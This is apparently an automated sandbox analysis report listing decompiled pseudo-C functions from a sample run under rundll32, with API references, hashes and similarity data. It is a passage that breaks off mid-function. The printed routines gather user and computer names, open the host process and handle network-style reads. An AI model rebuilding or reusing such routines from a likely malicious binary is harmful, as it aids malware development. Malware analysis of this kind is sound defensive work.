                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x408d33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}























                                          APIs
                                          • StrChrA.SHLWAPI(0408553C,0000005F,00000000,00000000,00000104), ref: 0408A675
                                          • memcpy.NTDLL(?,0408553C,?), ref: 0408A68E
                                          • lstrcpy.KERNEL32(?), ref: 0408A6A4
                                            • Part of subcall function 0408A5E9: lstrlen.KERNEL32(?,00000000,0408D330,00000001,0408937A,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?), ref: 0408A5F2
                                            • Part of subcall function 0408A5E9: mbstowcs.NTDLL ref: 0408A619
                                            • Part of subcall function 0408A5E9: memset.NTDLL ref: 0408A62B
                                            • Part of subcall function 04081BC1: lstrlenW.KERNEL32(0408553C,?,?,0408A818,3D0408C0,80000002,0408553C,04089642,74666F53,4D4C4B48,04089642,?,3D0408C0,80000002,0408553C,?), ref: 04081BE1
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0408A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 7d3af5178b6af9bbb077208a8fe91ef523619f9d6577fce85fa07c8df725a00d
                                          • Instruction ID: 73290d793008e6c9ba6bd477d350270772fb678f544895ba32ade6c1dfcdd36f
                                          • Opcode Fuzzy Hash: 7d3af5178b6af9bbb077208a8fe91ef523619f9d6577fce85fa07c8df725a00d
                                          • Instruction Fuzzy Hash: 27510B7160020AEBEF11BFA0DE40DDA7BB9EF04308F00852DB995B6550E739E9169F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0408614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E040858BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E0408147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x4085210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}
















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,0408520E), ref: 0408615E
                                          • GetComputerNameW.KERNEL32(00000000,0408520E), ref: 0408617A
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetUserNameW.ADVAPI32(00000000,0408520E), ref: 040861B4
                                          • GetComputerNameW.KERNEL32(0408520E,?), ref: 040861D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0408520E,00000000,04085210,00000000,00000000,?,?,0408520E), ref: 040861FA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 4bdf8024d77980df9221f16dedd5d8c084ca5b0a1133dede221f8bc7b5a4b8e0
                                          • Instruction ID: d88f495a388dd9687509bb21ccafd21ab9dac45a4fb069577c33d55566cbc92c
                                          • Opcode Fuzzy Hash: 4bdf8024d77980df9221f16dedd5d8c084ca5b0a1133dede221f8bc7b5a4b8e0
                                          • Instruction Fuzzy Hash: B321C976900508FFDB11EFE4DA84DEEBBB8EE44344B1145AEE641F7240E634AB44DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E040862CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x408d114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x408d238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

















                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04086301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0408632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04086341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04086350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0408636B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 0f7c53498af1ca5e0ad3260472bfa74f16deaddc587d09daf329bc0dee54902d
                                          • Instruction ID: 12740e66667e1390ba82bbecda6a5ed2a28a4d237db2c160ca968898db4e85cd
                                          • Opcode Fuzzy Hash: 0f7c53498af1ca5e0ad3260472bfa74f16deaddc587d09daf329bc0dee54902d
                                          • Instruction Fuzzy Hash: ED219C36900209AFDF11AF68C944AEEBFB9EF85304F058158F884AB300D735A915CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04089FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E04086B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E0408A96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x408d12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}








                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,040866AF,?,?,00000000,00000000), ref: 0408A021
                                          • ResetEvent.KERNEL32(?), ref: 0408A026
                                          • GetLastError.KERNEL32 ref: 0408A03E
                                          • GetLastError.KERNEL32(?,?,00000102,040866AF,?,?,00000000,00000000), ref: 0408A059
                                            • Part of subcall function 04086B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0408A006,?,?,?,?,00000102,040866AF,?,?,00000000), ref: 04086B7A
                                            • Part of subcall function 04086B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0408A006,?,?,?,?,00000102,040866AF,?), ref: 04086BD8
                                            • Part of subcall function 04086B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04086BE8
                                          • SetEvent.KERNEL32(?), ref: 0408A04C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 5d0f7e1ec4daf1eba71affaa1220c2938c1727565ff21c3dd80ac7c65eaf0c21
                                          • Instruction ID: 36a7eb1f37ccf667e866196b0d73c4065c272feb597309a25397bdcf0eb7aeda
                                          • Opcode Fuzzy Hash: 5d0f7e1ec4daf1eba71affaa1220c2938c1727565ff21c3dd80ac7c65eaf0c21
                                          • Instruction Fuzzy Hash: D6018F31204600AAEB307E60DE44F5BB6E5FF84368F104A2EF6D1B18E0D625F805DE61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04086A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x408d26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x408d25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x408d258 = _t6;
                                          					 *0x408d264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x408d254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x408d254 =  *0x408d254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}










                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,040890D2,?), ref: 04086A87
                                          • GetVersion.KERNEL32 ref: 04086A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04086AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04086ACF
                                          • GetLastError.KERNEL32 ref: 04086AEE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 11ad4c9f67123eefee3906ee58c067ffc87bf470e676fdc7bf0e9973a47d9849
                                          • Instruction ID: 58b4de184c532b5ca78773df3fb0c731f605d1d8a59ae4a8fc4944616e29815d
                                          • Opcode Fuzzy Hash: 11ad4c9f67123eefee3906ee58c067ffc87bf470e676fdc7bf0e9973a47d9849
                                          • Instruction Fuzzy Hash: C7F06D706443029BE750AF64BB09B153BB1EB54751F118A3EE5C2F61C0DA7ED851CF26
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E040891B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x408d2a4; // 0xbfa5a8
                                          					_t5 = _t103 + 0x408e038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x408c298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x408d2a4; // 0xbfa5a8
                                          												_t28 = _t109 + 0x408e0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x408d2a4; // 0xbfa5a8
                                          														_t33 = _t79 + 0x408e078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}






































                                          APIs
                                          • SysAllocString.OLEAUT32(0408C298), ref: 04089205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 040892E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 040892FF
                                          • SysFreeString.OLEAUT32(?), ref: 0408932E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 3000521cec2942a4df21c7fc7de9cb9a28ecea066ebb35a0e045cca566589fa0
                                          • Instruction ID: 3164d534c968693fc9e16d090bcae1b6d0945d89ea1e48298b46f3d81fa7c62d
                                          • Opcode Fuzzy Hash: 3000521cec2942a4df21c7fc7de9cb9a28ecea066ebb35a0e045cca566589fa0
                                          • Instruction Fuzzy Hash: FB513C75E00519EFCB00EFE8C9889EEB7B9EF89704B144598E955FB260D731AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E04087664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E040848F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E0408748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04087074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E04087074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E0408748A(_t101, 0x408d1b0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E0408748A(_a16, _a4);
                                          						E04082FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L0408B088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L0408B082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E04086FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E040815CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E0408687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x408d1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}






















                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04087711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04087727
                                          • memset.NTDLL ref: 040877C7
                                          • memset.NTDLL ref: 040877D7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 1bf43ce0ca2c93d490e90e8e13b539c638166e2195a02a36812bd2dad28281a2
                                          • Instruction ID: 756fbb6bf7d691bb2d4595eda112db811a3e25eaf3c0e035904940083b75fbdb
                                          • Opcode Fuzzy Hash: 1bf43ce0ca2c93d490e90e8e13b539c638166e2195a02a36812bd2dad28281a2
                                          • Instruction Fuzzy Hash: B4416131A00249ABDB10FEA8CD40FDE7BB4EF44718F20852DB955BB184EB71BA54CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0408A97E
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • ResetEvent.KERNEL32(?), ref: 0408A9F2
                                          • GetLastError.KERNEL32 ref: 0408AA15
                                          • GetLastError.KERNEL32 ref: 0408AAC0
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 70019b67ad4cb1dcb64f9028b5f79749a7b82ec582dcdf1cdbca66ccf6455da9
                                          • Instruction ID: fe40d63065e25dbe8b49752794e2cfc2d178321c651f2a9bd6c6f5a8f485f099
                                          • Opcode Fuzzy Hash: 70019b67ad4cb1dcb64f9028b5f79749a7b82ec582dcdf1cdbca66ccf6455da9
                                          • Instruction Fuzzy Hash: 95416471600604BBEB21AFA5DE88E9B7ABDEF84714B14492DB582F1990D739A905CE20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04088F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x408d138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x408d168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E040858BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x408d138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E0408147E(_v16);
                                          							if(_t58 == 0) {
